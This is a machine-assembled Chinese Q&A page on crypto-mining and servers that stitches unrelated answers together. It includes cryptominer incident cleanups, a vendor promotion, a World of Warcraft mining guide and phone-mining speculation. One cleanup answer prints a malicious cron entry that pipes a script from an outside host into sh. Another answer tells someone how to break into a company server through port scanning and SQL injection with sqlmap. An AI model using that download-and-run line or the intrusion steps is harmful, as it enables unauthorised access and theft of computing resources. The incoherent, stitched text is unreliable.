當前位置:首頁 » 挖礦知識 » 黑進學校伺服器挖礦

黑進學校伺服器挖礦

發布時間: 2023-03-20 09:18:29

『壹』 學校信息安全部門提示挖礦行為是什麼意思

利用電腦進行挖掘虛擬貨幣
虛擬貨幣「挖礦」活動極易引發能源、網路、金融等領域安全風險。
挖礦:即比特幣挖礦,是一種利用電腦硬體計算出比特幣的位置並獲取的過程。2、比特幣(BitCoin)的概念最初由中本聰在2009年提出,根據中本聰的思路設計發布的開源軟體以及建構其上的P2P網路。比特幣是一種P2P形式的數字貨幣。點對點的傳輸意味著一個去中心化的支付系統。3、比特幣挖礦機,就是用於賺取比特幣的電腦,這類電腦一般有專業的挖礦晶元,多採用燒顯卡的方式工作,耗電量較大。4、用戶用個人計算機下載軟體然後運行特定演算法,與遠方伺服器通訊後可得到相應比特幣,是獲取比特幣的方式之一,普通顯卡不用試試了電費都不夠,魯大師裡面有比特幣測試,可以看你電腦挖一個比特幣要多久。

『貳』 伺服器被攻擊並植入kdevtmpfsi挖礦/病毒/木馬

MongoDB庫中的數據莫名其妙沒有了,發覺如下信息:

1、 top -d 5命令 ,查看系統負載情況、是否有未知進程,發現一個名為kdevtmpfsi的進程,經科普它是一個挖礦程序,會佔用伺服器高額的CPU、內存資源。如圖,CPU佔用率高達788.7%,而且是yarn用戶下:

2、 ps -ef |grep kdevtmpfsi 命令查看 該挖礦程序路徑:/tmp/kdevtmpfsi

3、 ps -ef |grep yarn 命令查看更多關於yarn相關進程信息(此時我的伺服器並沒有開啟yarn服務,如果有yarn的相關進程則可判斷是攻擊者開啟的進程),發現另外還有個kinsing進程,經科普kinsing進程是kdevtmpfsi的守護進程:

4、 netstat -lntupaa 命令查看是否有異常的ip,果然發現194.87.102.77這個陌生的ip,判斷是kdevtmpfsi的發出者:

5、經查詢該ip的所在國家是俄羅斯:

6、 find / -iname kdevtmpfsi 命令再次確定命令所在位置以便刪除:

7、 cd /tmp 進入相關目錄:

8、 rm -rf kdevtmpfsi 刪除kdevtmpfsi程序:

9、** kill -9 40422**殺掉kdevtmpfsi進程:

10、發現並沒殺掉所有kdevtmpfsi進程,再次查找yarn的相關進程(因為之前已確認病毒是在yarn下),果真還有kdevtmpfsi進程存在:

11、用命令 批量殺掉 相關進程:

12、刪除kinsing文件:

13、現在,已經把挖礦程序及相關進程刪除掉了,但是還有兩處沒做處理:

14、 crontab -l 命令先看看crontab的定時任務列表吧:

15、編寫刪除挖礦程序腳本 kill_kdevtmpfsi.sh

16、新增 定時任務 並刪除攻擊者的挖礦定時任務:

17、 crontab -l命令 查看現在只有殺進程的定時任務了:

18、禁止黑客的IP地址。

最初安裝MongoDB時,並未設置密碼認證,存在漏洞,導致黑客通過漏洞攻擊伺服器,並在程序里植入木馬/病毒。單純的kill -9 id殺掉病毒進程是殺不徹底的,治標不治本,應該定時刪除病毒進程,禁止攻擊者IP,重新安裝系統或相關軟體。

經過幾天的觀察,伺服器運行正常,再沒有被黑客攻擊成功。

『叄』 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

『肆』 如何通過雲計算伺服器實現比特幣挖礦

  1. 各公有雲廠商都明確要求不允許使用雲伺服器進行挖礦,否則會被封禁的;

  2. 挖礦主要使用的是GPU,目前各公有雲廠商提供的GPU伺服器都比較貴的,從性價比上來說不劃算,還不如用專用晶元;

當然,有黑客通過漏洞入侵伺服器,在上面植入挖礦程序和腳本,進行挖礦操作,但這個本身是不合法的行為。

『伍』 求助伺服器被挖礦程序入侵,如何排查

新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接

伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般

會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這

就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客

戶伺服器卡的問題,我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,

仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查

當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病

毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,

客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開

發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重

的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,

SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器

一切穩定運行,網站打開正常。

『陸』 如何用Linux伺服器挖礦教程

今天早上起來一看,伺服器腳本一個都沒有啟動!甚是奇怪,遠程登錄伺服器,也是異常的卡,直到最後卡死,只好重新啟動伺服器!
啟動之後沒一會又會變卡,越來越卡,top查看進程!不覺又奇怪的進程,因為平常也不經常看!所以自己也搞不明白怎麼回事兒!只好到群里問了問,說是被挖礦的掛了木馬文件了,是由於redis的漏洞!
後來我自己發現,原來redis遠程可以直接登錄,原以為redis和mysql不開放登錄許可權就不會支持遠程登錄呢,看來是我想多了
看了好長時間才發現一個異常的進程,自啟的進程 molibe !
找到進程位置 ps -ef|grep molibe ;
在tmp目錄下,打開一看的確是有
chmod -x molibe 取消執行許可權在來到/var/spool/cron下,cat root 查看定時器的執行發現之前腳本都被改了,顧不得刪除cron,service crond restart 重新啟動,再有就時kill 掉molibe進程
這樣大概整個就結束了!但是根本是因為redis漏洞,所以還是補上吧
首先修改redis'埠,找到redis.conf文件 port **** 修改埠號再有就是必須修改密碼 # requirepass ******** 去除#號重新啟動 /redis/src/redis-server /redis/redis-conf
啟動成功之後
redis/redis-cli -p ****(埠) -a *****(密碼)

『柒』 我想黑入公司伺服器 有什麼辦法

弟一,找公司網站的漏洞,
第二,掃描埠,困此
第三,掃描後台,
第四,通過漏洞黑入伺服器,一般sql注入用的比較多。我是用sqlmap。
我只成功幾個豎尺運,並沒有破壞。破壞時違法的哦。而且就是,最好不要黑余梁政府,醫院,學校的伺服器。

『捌』 最近聽說進入不良網站,黑客會拿我們的手機挖礦啥的,自動彈出的不良網站我點進去一秒就退了,被挖礦嗎

沒有想的那麼神奇。。現在的不良網站一般都是教人如何賭博。。如何打架什麼的。通常會有賭博網站的連接在裡面。。誘惑你去賭博的。。沒有什麼挖礦什麼的。。退出去以後。重啟下手機。。基本就正常了。。

『玖』 WOW采礦100以後怎麼練

還是需要去各個地圖進行采礦,具體如下:

1、100—125:錫礦。

聯盟:黑海岸、洛克莫丹,100以後可以去灰谷、濕地。

部落:貧瘠之地,100以後可以去石爪山。

2、125-175:鐵礦。

聯盟:濕地、阿拉希高地。

部落:千針石林、荊棘谷。

3、175-250:秘銀礦。

聯盟/部落:荒蕪之地;

4、250-275:黑鐵礦(230就可以挖)+瑟銀礦。

聯盟/部落:灼熱峽谷,或者繼續在荒蕪之地練到275。

5、275-300:瑟銀礦+富瑟銀礦

各伺服器挖礦情況不一樣。如果冬泉谷和艾薩拉人少,就可以去。

(9)黑進學校伺服器挖礦擴展閱讀

魔獸采礦注意事項

玩家在采礦的時候會發現這些的礦物也是分為不同的類型的,主要有金屬、石頭和珠寶,石頭是不需要熔爐就可以直接加工的,珠寶是非常稀有的,可以通過殺死那些怪物或者從其他的玩家手中得到這些東西。

當玩家把滑鼠指針放在礦脈上的時候會看到不同的顏色,這代表著采礦的技能是否提高:灰色-不會提高技能;綠色-雖然會提高技能,但是機率很低;黃色-很可能提高你的采礦技能;橙色-每次都會提高采礦技能;紅色-你根本不能采這片礦,需要有更高的采礦技能才行。

如果已經得到了稀有寶貴的礦物,可以將它們熔煉成條狀以便以後製作盔甲、武器或者其它物品。去找一個熔爐,它們主要放置在主要的城鎮和某些小型城鎮里。為了確定真的找到了一個熔爐,把滑鼠指針放在微縮地圖上的相應位置,看上面是否標明了是熔爐。

『拾』 為什麼黑客們要廣設伺服器,用別人的手機設備去挖礦

因為用別人的手機會更加安全一點,這樣公安局或者安全局就不容易找到黑客的地址了。

「偷礦」是指未經你同意的情況下,黑客利用你的系統資源挖掘虛擬貨幣。這主要藉助於網站的 JavaScript 代碼,黑客在代碼中注入「偷礦」程序,當你訪問這些代碼時,「偷礦」程序便會偷偷自動運行。

雖然 Chrome 是最常用的瀏覽器,但是 Opera 瀏覽器提供了一些 Chrome 沒有的有趣功能。最新版本的 Opera 瀏覽器能夠自動攔截廣告,此外,它還內置了阻止挖礦的防護功能。這一功能可以阻止網站擅自運行非法挖礦的腳本,這與網頁上的廣告攔截技術並沒有太大區別。

2.使用清理程序

如果採用了上面的措施之後你仍然放心不下,那麼可以在電腦和智能手機上安裝 Malwarebytes 清理程序,它的電腦版是完全免費的,但是針對手機的高級版是收費的。隨著現在越來越多的區塊鏈項目開始採用手機挖礦,如果你不想讓自己的手機有被當作肉雞的風險,適當花點小錢也是值得的。

你仍然可以繼續使用像卡巴斯基這樣的防病毒軟體來保護自己的智能手機。




熱點內容
比特幣不值得投資的原因 發布:2025-07-11 04:02:09 瀏覽:490
幣圈前10大交易所 發布:2025-07-11 03:47:30 瀏覽:221
秦嶺稀土礦廣廟啞在什麼池方 發布:2025-07-11 03:29:08 瀏覽:668
柯橋客運中心可以去杭州蕭山機場 發布:2025-07-11 02:47:19 瀏覽:903
區塊鏈新能源交易 發布:2025-07-11 02:45:01 瀏覽:496
otc與ltc流程的區別 發布:2025-07-11 02:39:59 瀏覽:394
門羅幣怎麼進入礦池 發布:2025-07-11 02:32:40 瀏覽:369
區塊鏈瀏覽器btccom 發布:2025-07-11 01:33:35 瀏覽:807
易語言btc自動交易 發布:2025-07-11 01:21:57 瀏覽:819
長沙礦池挖礦連接異常 發布:2025-07-11 00:55:49 瀏覽:833